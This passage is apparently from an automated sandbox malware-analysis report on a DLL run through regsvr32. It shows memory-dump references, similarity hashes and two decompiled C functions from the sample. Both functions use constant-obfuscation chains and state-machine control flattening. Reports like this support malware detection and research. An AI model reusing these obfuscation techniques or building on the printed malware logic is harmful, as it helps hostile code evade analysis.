                                                                                                                0x10012810
                                                                                                                0x10012810
                                                                                                                0x1001281b
                                                                                                                0x10012823
                                                                                                                0x10012824
                                                                                                                0x10012839

                                                                                                                APIs
                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 10012659
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID: %08X%08X$c:\
                                                                                                                • API String ID: 2039140958-3129558565
                                                                                                                • Opcode ID: 58f2a6bb30b0d3534e36166c84e75d48c19b438be0fc071ac721ba834e4b4b28
                                                                                                                • Instruction ID: 383ca456418867eed030b8b1388c456a826389f081089cec5dd2cd7039686146
                                                                                                                • Opcode Fuzzy Hash: 58f2a6bb30b0d3534e36166c84e75d48c19b438be0fc071ac721ba834e4b4b28
                                                                                                                • Instruction Fuzzy Hash: E5B17AB42086419FE355CB28C851B9BB7E5FFC9364F14861CF1A9CB2E1DB30A944CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BEEC2 Relevance: 5.3, Strings: 4, Instructions: 349COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001BEEC2(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _t319;
				intOrPtr _t330;
				intOrPtr _t331;
				void* _t334;
				intOrPtr _t335;
				intOrPtr _t339;
				intOrPtr _t344;
				void* _t346;
				intOrPtr _t348;
				void* _t352;
				intOrPtr _t353;
				void* _t356;
				intOrPtr _t362;
				intOrPtr _t363;
				intOrPtr _t395;
				void* _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				intOrPtr _t405;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t411;

				_push(_a20);
				_t406 = __edx;
				_push(_a16);
				_v284 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(__ecx);
				_v380 = 0x2d3ac2;
				_t408 = _t407 + 0x1c;
				_v380 = _v380 | 0x68f5ad44;
				_v380 = _v380 ^ 0x1e544770;
				_t353 = 0;
				_t356 = 0x91c5fd4;
				_t400 = 0x6f;
				_v380 = _v380 / _t400;
				_v380 = _v380 ^ 0x0119c283;
				_v328 = 0x428f67;
				_v328 = _v328 + 0xffff77f8;
				_v328 = _v328 | 0x9f29f037;
				_v328 = _v328 ^ 0x9f6932ec;
				_v316 = 0xc93985;
				_v316 = _v316 >> 5;
				_v316 = _v316 ^ 0x0007a940;
				_v344 = 0x20b305;
				_v344 = _v344 | 0x663777d8;
				_v344 = _v344 ^ 0x66365aac;
				_v300 = 0x15378f;
				_v300 = _v300 + 0xffff208d;
				_v300 = _v300 ^ 0x00116b1c;
				_v312 = 0xc9e24c;
				_v312 = _v312 | 0x3fcfd123;
				_v312 = _v312 ^ 0x3fc36414;
				_v388 = 0x2d039f;
				_v388 = _v388 << 2;
				_v388 = _v388 + 0xffff7214;
				_v388 = _v388 << 0xf;
				_v388 = _v388 ^ 0xc0476441;
				_v288 = 0x4c4bb5;
				_t401 = 0x34;
				_v288 = _v288 / _t401;
				_v288 = _v288 ^ 0x0005c766;
				_v396 = 0x7dfd35;
				_v396 = _v396 + 0xffff0f93;
				_v396 = _v396 + 0xffff26a3;
				_v396 = _v396 << 5;
				_v396 = _v396 ^ 0x0f8af879;
				_v320 = 0xe5374e;
				_v320 = _v320 + 0xaac;
				_v320 = _v320 ^ 0x00e775ed;
				_v336 = 0x6b6a8;
				_v336 = _v336 ^ 0x8d2b844a;
				_v336 = _v336 >> 0xc;
				_v336 = _v336 ^ 0x000a7bd7;
				_v292 = 0x7d6921;
				_v292 = _v292 * 0x4b;
				_v292 = _v292 ^ 0x24ba1552;
				_v368 = 0x59061b;
				_v368 = _v368 ^ 0x08ef6f96;
				_v368 = _v368 << 0xb;
				_v368 = _v368 ^ 0xb3496db7;
				_v304 = 0x460ae5;
				_v304 = _v304 << 3;
				_v304 = _v304 ^ 0x023ec4ee;
				_v364 = 0xc52a4b;
				_v364 = _v364 + 0xffff24ad;
				_v364 = _v364 + 0xffff3837;
				_v364 = _v364 ^ 0x00c3c2de;
				_v296 = 0x33dfb;
				_v296 = _v296 >> 0x10;
				_v296 = _v296 ^ 0x0001f9cf;
				_v376 = 0x8fbeb1;
				_v376 = _v376 ^ 0xdf5668a7;
				_v376 = _v376 << 1;
				_t402 = 0x17;
				_v376 = _v376 / _t402;
				_v376 = _v376 ^ 0x085066b4;
				_v392 = 0x25a6b0;
				_v392 = _v392 + 0xefc7;
				_v392 = _v392 ^ 0xa9b709e2;
				_t403 = 0x7d;
				_v392 = _v392 / _t403;
				_v392 = _v392 ^ 0x015a7847;
				_v352 = 0xb1c65f;
				_t404 = 0x30;
				_v352 = _v352 / _t404;
				_v352 = _v352 | 0xa24a7a91;
				_v352 = _v352 ^ 0xa24f4045;
				_v404 = 0x870864;
				_v404 = _v404 ^ 0xc483cb7e;
				_v404 = _v404 * 0x71;
				_v404 = _v404 ^ 0x4828da17;
				_v404 = _v404 ^ 0xce3b8e48;
				_v360 = 0x523c3a;
				_v360 = _v360 << 3;
				_v360 = _v360 ^ 0xabe904b9;
				_v360 = _v360 ^ 0xa9754472;
				_v372 = 0xa159f;
				_v372 = _v372 ^ 0xadd9838a;
				_v372 = _v372 >> 0xc;
				_v372 = _v372 + 0xffffff77;
				_v372 = _v372 ^ 0x0002e382;
				_v308 = 0xc08961;
				_v308 = _v308 << 9;
				_v308 = _v308 ^ 0x811019c4;
				_v332 = 0xc0cd6c;
				_v332 = _v332 ^ 0x9e3d6b9c;
				_v332 = _v332 >> 0xd;
				_v332 = _v332 ^ 0x000c8c07;
				_v324 = 0x5c15b7;
				_v324 = _v324 ^ 0x7f2e955f;
				_v324 = _v324 ^ 0x7f730aa2;
				_v340 = 0xf88b65;
				_v340 = _v340 * 0x53;
				_v340 = _v340 >> 0xf;
				_v340 = _v340 ^ 0x0006865d;
				_v356 = 0xc3f938;
				_v356 = _v356 << 7;
				_v356 = _v356 + 0xffffeeaf;
				_v356 = _v356 ^ 0x61f5b0d9;
				_v400 = 0x9adc7;
				_v400 = _v400 >> 0xa;
				_v400 = _v400 + 0x1ff5;
				_v400 = _v400 + 0xffff9cae;
				_v400 = _v400 ^ 0xfff01e1f;
				_v348 = 0xdbbe1d;
				_v348 = _v348 * 0x18;
				_v348 = _v348 | 0x09a9567e;
				_v348 = _v348 ^ 0x1dbbdff9;
				_v384 = 0x583c15;
				_v384 = _v384 ^ 0x42db3d3f;
				_v384 = _v384 >> 4;
				_v384 = _v384 >> 8;
				_v384 = _v384 ^ 0x00042c30;
				_t405 = _v284;
				while(1) {
					L1:
					_t319 = 0xc8e66e0;
					do {
						while(1) {
							L2:
							_t411 = _t356 - 0x67d44ef;
							if(_t411 > 0) {
								break;
							}
							if(_t411 == 0) {
								_t334 = E001B2B1F(_v404,  &_v264, _a8, _v360);
								_t408 = _t408 + 0xc;
								if(_t334 != 0) {
									_t399 = 0x7c0872b;
									_t353 = 1;
								}
								_t356 = 0x70afad8;
								while(1) {
									L1:
									_t319 = 0xc8e66e0;
									goto L2;
								}
							}
							if(_t356 == 0x31c7c2e) {
								_t335 =  *0x1c4218; // 0x0
								_t339 =  *0x1c4218; // 0x0
								_t344 =  *0x1c4218; // 0x0
								_t346 = E001BBD63( *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x1c)))), _t405,  &_v264,  &_v272, _v304, _v364,  *((intOrPtr*)(_t339 + 0x1c)) + 0x10, _v296,  &_v256, _v376,  *( *((intOrPtr*)(_t335 + 0x1c)) + 0x38) & 0x0000ffff, _v392);
								_t408 = _t408 + 0x28;
								if(_t346 == 0) {
									_t399 = 0xe833939;
									_t356 = 0x5fa529e;
								} else {
									_t356 = 0x67d44ef;
								}
								while(1) {
									L1:
									_t319 = 0xc8e66e0;
									goto L2;
								}
							}
							if(_t356 == 0x5535232) {
								if(_v276 >= _v384) {
									_t348 = E001B519C( &_v280,  &_v272);
								} else {
									_t348 = E001BE168( &_v280);
								}
								_t405 = _t348;
								_t319 = 0xc8e66e0;
								_t356 =  !=  ? 0xc8e66e0 : 0x5fa529e;
								continue;
							}
							if(_t356 == 0x5fa529e) {
								E001B17D2(_v332, _v324, _v280);
								E001B17D2(_v340, _v356, _t405);
								E001B17D2(_v400, _v348, _v272);
								_t356 = _t399;
								L33:
								_t319 = 0xc8e66e0;
								goto L34;
							}
							if(_t356 != 0x61a9530) {
								goto L34;
							}
							_t352 = E001B1B29( &_v280, _v344, _v300, _v284, _v312, _t406);
							_t408 = _t408 + 0x10;
							if(_t352 == 0) {
								L37:
								return _t353;
							}
							_t356 = 0x5535232;
							while(1) {
								L1:
								_t319 = 0xc8e66e0;
								goto L2;
							}
						}
						if(_t356 == 0x70afad8) {
							E001B17D2(_v372, _v308, _v264);
							_t356 = 0x5fa529e;
							goto L33;
						}
						if(_t356 == 0x91c5fd4) {
							_t405 = 0;
							_t288 =  &_v328; // 0xe775ed
							E001B25CD(_v380,  *_t288, 0x100, _v316,  &_v256);
							_v272 = _v272 & 0;
							_t408 = _t408 + 0xc;
							_v268 = _v268 & 0;
							_t356 = 0x61a9530;
							_v280 = _v280 & 0;
							_v276 = _v276 & 0;
							while(1) {
								L1:
								_t319 = 0xc8e66e0;
								goto L2;
							}
						}
						if(_t356 == _t319) {
							_push(0x40);
							E001A8744(_v320, _v336, 0xb, _v292, E001B96D4(_t356, 1),  &_v256, _v368);
							_t408 = _t408 + 0x20;
							_t356 = 0x31c7c2e;
							while(1) {
								L1:
								_t319 = 0xc8e66e0;
								goto L2;
							}
						}
						if(_t356 != 0xe833939) {
							goto L34;
						}
						_t362 =  *0x1c4218; // 0x0
						_t330 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c)) + 0x3c));
						 *((intOrPtr*)(_t362 + 8)) =  *((intOrPtr*)(_t362 + 8)) + 1;
						_t395 =  *((intOrPtr*)(_t362 + 8));
						 *((intOrPtr*)(_t362 + 0x1c)) = _t330;
						if(_t330 == 0) {
							 *((intOrPtr*)(_t362 + 0x1c)) =  *((intOrPtr*)(_t362 + 0x20));
						}
						_t331 =  *0x1c4218; // 0x0
						if(_t395 >=  *((intOrPtr*)(_t331 + 4))) {
							_t363 =  *0x1c4218; // 0x0
							 *(_t363 + 8) =  *(_t363 + 8) & 0x00000000;
							goto L37;
						} else {
							_t356 = 0x91c5fd4;
							goto L1;
						}
						L34:
					} while (_t356 != 0x7c0872b);
					goto L37;
				}
			}


































































                                                                                                                0x001beecc
                                                                                                                0x001beed3
                                                                                                                0x001beed7
                                                                                                                0x001beede
                                                                                                                0x001beee5
                                                                                                                0x001beeec
                                                                                                                0x001beef3
                                                                                                                0x001beefa
                                                                                                                0x001beefb
                                                                                                                0x001beefc
                                                                                                                0x001bef01
                                                                                                                0x001bef09
                                                                                                                0x001bef0c
                                                                                                                0x001bef16
                                                                                                                0x001bef1e
                                                                                                                0x001bef24
                                                                                                                0x001bef2b
                                                                                                                0x001bef30
                                                                                                                0x001bef36
                                                                                                                0x001bef3e
                                                                                                                0x001bef46
                                                                                                                0x001bef4e
                                                                                                                0x001bef56
                                                                                                                0x001bef5e
                                                                                                                0x001bef66
                                                                                                                0x001bef6b
                                                                                                                0x001bef73
                                                                                                                0x001bef7b
                                                                                                                0x001bef83
                                                                                                                0x001bef8b
                                                                                                                0x001bef96
                                                                                                                0x001befa1
                                                                                                                0x001befac
                                                                                                                0x001befb4
                                                                                                                0x001befbc
                                                                                                                0x001befc4
                                                                                                                0x001befcc
                                                                                                                0x001befd1
                                                                                                                0x001befd9
                                                                                                                0x001befde
                                                                                                                0x001befe6
                                                                                                                0x001beff8
                                                                                                                0x001beffb
                                                                                                                0x001bf002
                                                                                                                0x001bf00d
                                                                                                                0x001bf015
                                                                                                                0x001bf01d
                                                                                                                0x001bf025
                                                                                                                0x001bf02a
                                                                                                                0x001bf032
                                                                                                                0x001bf03a
                                                                                                                0x001bf042
                                                                                                                0x001bf04a
                                                                                                                0x001bf052
                                                                                                                0x001bf05a
                                                                                                                0x001bf05f
                                                                                                                0x001bf067
                                                                                                                0x001bf07a
                                                                                                                0x001bf081
                                                                                                                0x001bf08c
                                                                                                                0x001bf094
                                                                                                                0x001bf09c
                                                                                                                0x001bf0a1
                                                                                                                0x001bf0a9
                                                                                                                0x001bf0b1
                                                                                                                0x001bf0b6
                                                                                                                0x001bf0be
                                                                                                                0x001bf0c6
                                                                                                                0x001bf0d0
                                                                                                                0x001bf0d8
                                                                                                                0x001bf0e0
                                                                                                                0x001bf0eb
                                                                                                                0x001bf0f3
                                                                                                                0x001bf0fe
                                                                                                                0x001bf106
                                                                                                                0x001bf10e
                                                                                                                0x001bf118
                                                                                                                0x001bf11d
                                                                                                                0x001bf123
                                                                                                                0x001bf12b
                                                                                                                0x001bf133
                                                                                                                0x001bf13b
                                                                                                                0x001bf147
                                                                                                                0x001bf14c
                                                                                                                0x001bf152
                                                                                                                0x001bf15a
                                                                                                                0x001bf166
                                                                                                                0x001bf169
                                                                                                                0x001bf16d
                                                                                                                0x001bf175
                                                                                                                0x001bf17d
                                                                                                                0x001bf185
                                                                                                                0x001bf192
                                                                                                                0x001bf196
                                                                                                                0x001bf19e
                                                                                                                0x001bf1a6
                                                                                                                0x001bf1ae
                                                                                                                0x001bf1b3
                                                                                                                0x001bf1bb
                                                                                                                0x001bf1c3
                                                                                                                0x001bf1cb
                                                                                                                0x001bf1d3
                                                                                                                0x001bf1d8
                                                                                                                0x001bf1e0
                                                                                                                0x001bf1e8
                                                                                                                0x001bf1f0
                                                                                                                0x001bf1f5
                                                                                                                0x001bf1fd
                                                                                                                0x001bf205
                                                                                                                0x001bf20d
                                                                                                                0x001bf212
                                                                                                                0x001bf21a
                                                                                                                0x001bf222
                                                                                                                0x001bf22a
                                                                                                                0x001bf232
                                                                                                                0x001bf23f
                                                                                                                0x001bf243
                                                                                                                0x001bf248
                                                                                                                0x001bf250
                                                                                                                0x001bf258
                                                                                                                0x001bf25d
                                                                                                                0x001bf265
                                                                                                                0x001bf26d
                                                                                                                0x001bf275
                                                                                                                0x001bf27a
                                                                                                                0x001bf282
                                                                                                                0x001bf28a
                                                                                                                0x001bf292
                                                                                                                0x001bf29f
                                                                                                                0x001bf2a3
                                                                                                                0x001bf2ab
                                                                                                                0x001bf2b3
                                                                                                                0x001bf2bb
                                                                                                                0x001bf2c3
                                                                                                                0x001bf2c8
                                                                                                                0x001bf2cd
                                                                                                                0x001bf2dc
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e8
                                                                                                                0x001bf2e8
                                                                                                                0x001bf2e8
                                                                                                                0x001bf2e8
                                                                                                                0x001bf2ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001bf2f4
                                                                                                                0x001bf470
                                                                                                                0x001bf475
                                                                                                                0x001bf47a
                                                                                                                0x001bf47e
                                                                                                                0x001bf483
                                                                                                                0x001bf483
                                                                                                                0x001bf48b
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x00000000
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf300
                                                                                                                0x001bf3dc
                                                                                                                0x001bf3fe
                                                                                                                0x001bf425
                                                                                                                0x001bf430
                                                                                                                0x001bf435
                                                                                                                0x001bf43a
                                                                                                                0x001bf446
                                                                                                                0x001bf44b
                                                                                                                0x001bf43c
                                                                                                                0x001bf43c
                                                                                                                0x001bf43c
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x00000000
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf30c
                                                                                                                0x001bf3ad
                                                                                                                0x001bf3bd
                                                                                                                0x001bf3af
                                                                                                                0x001bf3af
                                                                                                                0x001bf3af
                                                                                                                0x001bf3c2
                                                                                                                0x001bf3cb
                                                                                                                0x001bf3d0
                                                                                                                0x00000000
                                                                                                                0x001bf3d0
                                                                                                                0x001bf318
                                                                                                                0x001bf36a
                                                                                                                0x001bf379
                                                                                                                0x001bf38e
                                                                                                                0x001bf394
                                                                                                                0x001bf5a3
                                                                                                                0x001bf5a3
                                                                                                                0x00000000
                                                                                                                0x001bf5a3
                                                                                                                0x001bf320
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001bf344
                                                                                                                0x001bf349
                                                                                                                0x001bf34e
                                                                                                                0x001bf5c3
                                                                                                                0x001bf5cc
                                                                                                                0x001bf5cc
                                                                                                                0x001bf354
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x00000000
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf49b
                                                                                                                0x001bf598
                                                                                                                0x001bf59e
                                                                                                                0x00000000
                                                                                                                0x001bf59e
                                                                                                                0x001bf4a7
                                                                                                                0x001bf547
                                                                                                                0x001bf54e
                                                                                                                0x001bf55b
                                                                                                                0x001bf560
                                                                                                                0x001bf567
                                                                                                                0x001bf56a
                                                                                                                0x001bf571
                                                                                                                0x001bf576
                                                                                                                0x001bf57d
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x00000000
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf4af
                                                                                                                0x001bf503
                                                                                                                0x001bf52e
                                                                                                                0x001bf533
                                                                                                                0x001bf536
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x00000000
                                                                                                                0x001bf2e3
                                                                                                                0x001bf2e3
                                                                                                                0x001bf4b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001bf4bd
                                                                                                                0x001bf4c6
                                                                                                                0x001bf4c9
                                                                                                                0x001bf4cc
                                                                                                                0x001bf4cf
                                                                                                                0x001bf4d4
                                                                                                                0x001bf4d9
                                                                                                                0x001bf4d9
                                                                                                                0x001bf4dc
                                                                                                                0x001bf4e4
                                                                                                                0x001bf5b6
                                                                                                                0x001bf5bc
                                                                                                                0x00000000
                                                                                                                0x001bf4ea
                                                                                                                0x001bf4ea
                                                                                                                0x00000000
                                                                                                                0x001bf4ea
                                                                                                                0x001bf5a8
                                                                                                                0x001bf5a8
                                                                                                                0x00000000
                                                                                                                0x001bf5b4

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !i}$:<R$F$u
                                                                                                                • API String ID: 0-712849541
                                                                                                                • Opcode ID: f7f8295cd181312ebe0aa22459fcc0bc1271cb2ae76fd27e49d480f0fa6e6f76
                                                                                                                • Instruction ID: a978b0e81b368ad1772fc6b7864f2d001ac06ba2b821a818cb8339e4718626c0
                                                                                                                • Opcode Fuzzy Hash: f7f8295cd181312ebe0aa22459fcc0bc1271cb2ae76fd27e49d480f0fa6e6f76
                                                                                                                • Instruction Fuzzy Hash: 230256715083409FC768CF65C585A9BBBE1FBC4758F60891DF68A86260D7B1C94ACF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A958A Relevance: 5.3, Strings: 4, Instructions: 262COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001A958A(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t304;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				void* _t352;
				void* _t353;
				signed int* _t356;

				_t356 =  &_v1680;
				_v1664 = 0xc19a19;
				_t352 = __ecx;
				_t353 = 0x2b81e36;
				_t316 = 0x67;
				_v1664 = _v1664 / _t316;
				_v1664 = _v1664 + 0xfffffd8d;
				_v1664 = _v1664 + 0xffffa5ef;
				_v1664 = _v1664 ^ 0x000dde3a;
				_v1584 = 0x581344;
				_t317 = 0x65;
				_v1584 = _v1584 / _t317;
				_v1584 = _v1584 ^ 0x00015c6f;
				_v1600 = 0x2429e4;
				_v1600 = _v1600 >> 0xd;
				_t318 = 6;
				_v1600 = _v1600 * 0x1f;
				_v1600 = _v1600 ^ 0x000dce82;
				_v1604 = 0x26fb34;
				_v1604 = _v1604 << 3;
				_v1604 = _v1604 + 0xa8a6;
				_v1604 = _v1604 ^ 0x013e1a98;
				_v1636 = 0xc6d141;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 << 7;
				_v1636 = _v1636 ^ 0x6d11db18;
				_v1612 = 0x89f344;
				_v1612 = _v1612 + 0xd981;
				_v1612 = _v1612 >> 0xb;
				_v1612 = _v1612 ^ 0x000f922d;
				_v1628 = 0xb0a288;
				_v1628 = _v1628 ^ 0xdebaad5a;
				_v1628 = _v1628 ^ 0x1a6d48cf;
				_v1628 = _v1628 ^ 0xc46f8b65;
				_v1656 = 0xd951ba;
				_v1656 = _v1656 ^ 0xf1cac2bf;
				_v1656 = _v1656 << 8;
				_v1656 = _v1656 + 0xffffc08d;
				_v1656 = _v1656 ^ 0x13998d43;
				_v1568 = 0xf34eef;
				_v1568 = _v1568 ^ 0x3a7ae3f6;
				_v1568 = _v1568 ^ 0x3a8bc50b;
				_v1672 = 0x4d37d5;
				_v1672 = _v1672 << 5;
				_v1672 = _v1672 | 0x933c96e5;
				_v1672 = _v1672 >> 5;
				_v1672 = _v1672 ^ 0x04d852ba;
				_v1680 = 0x840e45;
				_v1680 = _v1680 * 0x5d;
				_v1680 = _v1680 * 0x1d;
				_v1680 = _v1680 * 0x4b;
				_v1680 = _v1680 ^ 0x9614cb06;
				_v1620 = 0x84e7d6;
				_v1620 = _v1620 + 0xf311;
				_v1620 = _v1620 / _t318;
				_v1620 = _v1620 ^ 0x0017ceb8;
				_v1596 = 0x7b1170;
				_v1596 = _v1596 + 0xffff940a;
				_v1596 = _v1596 >> 3;
				_v1596 = _v1596 ^ 0x000738d6;
				_v1572 = 0x7f7aa2;
				_v1572 = _v1572 ^ 0x6b515ecb;
				_v1572 = _v1572 ^ 0x6b26d5d7;
				_v1648 = 0xea0ee0;
				_v1648 = _v1648 ^ 0x2a4fb26a;
				_t319 = 0x18;
				_v1648 = _v1648 * 0x59;
				_v1648 = _v1648 ^ 0xd39ea8a8;
				_v1588 = 0x7294e;
				_v1588 = _v1588 / _t319;
				_v1588 = _v1588 + 0xd220;
				_v1588 = _v1588 ^ 0x000937d8;
				_v1580 = 0xe4f020;
				_v1580 = _v1580 ^ 0x75ac60b8;
				_v1580 = _v1580 ^ 0x75426166;
				_v1564 = 0x41b2c8;
				_v1564 = _v1564 + 0x5b41;
				_v1564 = _v1564 ^ 0x0041c0c2;
				_v1668 = 0x57251b;
				_v1668 = _v1668 ^ 0x547b387c;
				_v1668 = _v1668 ^ 0xa76c8ea1;
				_v1668 = _v1668 + 0xffff6d22;
				_v1668 = _v1668 ^ 0xf3424433;
				_v1576 = 0x8bc1cd;
				_v1576 = _v1576 ^ 0x6ed5b691;
				_v1576 = _v1576 ^ 0x6e54d64e;
				_v1676 = 0xc7b0c;
				_v1676 = _v1676 >> 4;
				_v1676 = _v1676 ^ 0x5a1cca20;
				_t320 = 0x6b;
				_v1676 = _v1676 * 0x55;
				_v1676 = _v1676 ^ 0xeb5f0246;
				_v1608 = 0x16f58a;
				_v1608 = _v1608 + 0xffff29c6;
				_v1608 = _v1608 | 0xc402f238;
				_v1608 = _v1608 ^ 0xc41784a0;
				_v1616 = 0x942680;
				_v1616 = _v1616 | 0x011dd7c3;
				_v1616 = _v1616 + 0xa2ce;
				_v1616 = _v1616 ^ 0x0195346b;
				_v1652 = 0x560519;
				_v1652 = _v1652 ^ 0x239149e6;
				_v1652 = _v1652 >> 6;
				_v1652 = _v1652 * 0x2a;
				_v1652 = _v1652 ^ 0x177dcd28;
				_v1660 = 0x2d1ebe;
				_v1660 = _v1660 * 0x7f;
				_v1660 = _v1660 ^ 0xdb88960f;
				_v1660 = _v1660 + 0xffffabb1;
				_v1660 = _v1660 ^ 0xcde17186;
				_v1592 = 0xb043a7;
				_v1592 = _v1592 / _t320;
				_t321 = 0x66;
				_v1592 = _v1592 / _t321;
				_v1592 = _v1592 ^ 0x000638f6;
				_v1624 = 0xc7c902;
				_t322 = 0x53;
				_v1624 = _v1624 / _t322;
				_v1624 = _v1624 * 0x60;
				_v1624 = _v1624 ^ 0x00e78cce;
				_v1632 = 0x9f0dab;
				_v1632 = _v1632 ^ 0xf8eab3c0;
				_t304 = _v1632 * 0x3c;
				_v1632 = _t304;
				_v1632 = _v1632 ^ 0x3b9f96e2;
				_v1640 = 0x719f06;
				_v1640 = _v1640 ^ 0x1254811e;
				_v1640 = _v1640 >> 0xd;
				_v1640 = _v1640 ^ 0x0007e723;
				_v1644 = 0x71343;
				_v1644 = _v1644 + 0x2e9;
				_v1644 = _v1644 >> 9;
				_v1644 = _v1644 ^ 0x000e986a;
				while(_t353 != 0x864531) {
					if(_t353 == 0x2b81e36) {
						_t353 = 0x74f4821;
						continue;
					} else {
						_t361 = _t353 - 0x74f4821;
						if(_t353 != 0x74f4821) {
							L8:
							__eflags = _t353 - 0x6c3f2c3;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E001C0575(_v1664, _v1584, _t361, _t322,  &_v1560, _v1600);
							 *((short*)(E001A2263( &_v1560, _v1604, _v1636, _v1612))) = 0;
							E001B9054(_v1628,  &_v520, _t361, _v1656, _v1568, _v1672);
							_push(_v1572);
							_push(0x1a11a8);
							_push(_v1596);
							_t258 =  &_v1620; // 0x75426166
							E001B8EB3( &_v1560, _t361, _v1648, _v1680, _v1588,  &_v1040, _v1580, E001BF5D9(_v1680,  *_t258, _t361), _v1564);
							E001BF94B(_t310, _v1668, _v1576, _v1676, _v1608);
							_t322 =  &_v1040;
							_t304 = E001C05F6( &_v1040, _t352, _v1616, _v1652, _v1660, _v1592);
							_t356 =  &(_t356[0x19]);
							if(_t304 != 0) {
								_t353 = 0x864531;
								continue;
							}
						}
					}
					return _t304;
				}
				__eflags = 0;
				_t322 = _v1624;
				_t304 = E001B4E54(_v1624, 0, 0, 0, 0, _v1632,  &_v1040, _v1640, _v1624, _v1644);
				_t356 =  &(_t356[7]);
				_t353 = 0x6c3f2c3;
				goto L8;
			}














































                                                                                                                0x001a958a
                                                                                                                0x001a9590
                                                                                                                0x001a95a4
                                                                                                                0x001a95a6
                                                                                                                0x001a95ab
                                                                                                                0x001a95b0
                                                                                                                0x001a95b6
                                                                                                                0x001a95be
                                                                                                                0x001a95c6
                                                                                                                0x001a95ce
                                                                                                                0x001a95da
                                                                                                                0x001a95df
                                                                                                                0x001a95e5
                                                                                                                0x001a95ed
                                                                                                                0x001a95f5
                                                                                                                0x001a95ff
                                                                                                                0x001a9600
                                                                                                                0x001a9604
                                                                                                                0x001a960c
                                                                                                                0x001a9614
                                                                                                                0x001a9619
                                                                                                                0x001a9621
                                                                                                                0x001a9629
